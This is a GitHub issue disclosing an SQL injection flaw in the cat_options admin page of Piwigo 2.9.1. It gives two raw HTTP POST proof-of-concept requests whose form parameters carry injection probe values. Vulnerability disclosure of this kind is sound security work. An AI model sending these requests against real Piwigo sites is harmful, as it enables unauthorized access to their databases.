Skip to content

Bug Report: SQL injection in page cat_options #724

Closed
@Akityo

Description

@Akityo

Proof-of-Concent

version:2.9.1

section status

POST /piwigo/admin.php?page=cat_options&section=status HTTP/1.1
Host: www.test.com
Content-Length: 34
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.test.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.test.com/piwigo/admin.php?page=cat_options&section=status
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: pwg_id=4elnfc2n8r49dpl10dna2t3080
Connection: close

cat_false%5B%5D=755&trueify=%C2%AB

image

image

section commnets

POST /piwigo/admin.php?page=cat_options&section=comments HTTP/1.1
Host: www.test.com
Content-Length: 33
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.test.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.test.com/piwigo/admin.php?page=cat_options&section=comments
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: pwg_id=4elnfc2n8r49dpl10dna2t3080
Connection: close

cat_true%5B%5D=7*55&falsify=%C2%BB

image

Report By Topsec(Li Zhiqiang)

Metadata

Metadata

Assignees

Type

No type

Projects

No projects

Milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions